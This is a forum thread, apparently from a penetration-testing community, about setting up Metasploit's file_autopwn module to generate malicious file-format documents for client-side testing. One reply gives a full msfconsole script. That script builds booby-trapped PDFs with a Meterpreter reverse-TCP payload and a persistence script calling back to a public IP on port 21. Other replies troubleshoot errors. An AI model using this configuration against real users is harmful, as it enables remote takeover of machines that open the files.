Metasploit auxiliary file_autopwn module - Video Tutorial
hi,
the relatively new msf 3 module auxiliary/server/file_autopwn is a very nice little feature to test all known file format client-side attacks.
Using this script will provide you a web page with the relevant msf3 files, where you can perform all your client-side tests for known vulnerabilities.
A quick video on how to set it up can be found here...
http://zerohat.de/_shared_files/vide..._file_autopwn/
/brtw2003
Re: Metasploit auxiliary file_autopwn module - Video Tutorial
[[solved]] The PDF I was using to inject was causing the error, and also the LPORT_WIN32 defaults to 3333 (the rev shell listen port). Not sure how to pass the "OnlyFiles" actions, but whatever..
Nice!
I got no luck with
windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:
(tried to replace localhost with my IP to a different host, no luck)
http://rmccurdy.com/scripts/msf_shells/out.txt
I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works, so maybe I am missing something. It looks as though it is creating the files fine, but I get a DOS box popup with the file_autopwn and nothing in Wireshark?
Code:
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
Re: Metasploit auxiliary file_autopwn module - Video Tutorial
Great content. Will have to try it out.
However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.
Re: Metasploit auxiliary file_autopwn module - Video Tutorial
It was the PDF! I used the one in your example and it works (at least with pdf exe).
Re: Metasploit auxiliary file_autopwn module - Video Tutorial
Nice video / tutorial. Went ahead and gave this a whirl, used just about the same syntax as you, just different locations and such, and scripted it out. After running my script I get errors stating
Code:
Exploit failed: SQLite3::SQLException: library routine called out of sequence: SELECT * FROM "workspaces" WHERE ("workspaces"."name" = 'default' ) LIMIT 1
This continues on as it loops through all my file format exploits. When it gets to the end it comes back saying done, found 2 exploit modules, and launches the attack, starts up the folder where I can find vulnerabilities.
I was reading around and it appears this happens if there are too many connections to the database going on at once. I followed your instructions on how to fix an error within Metasploit in regards to pools; doing that did not resolve this problem.
Any help is appreciated.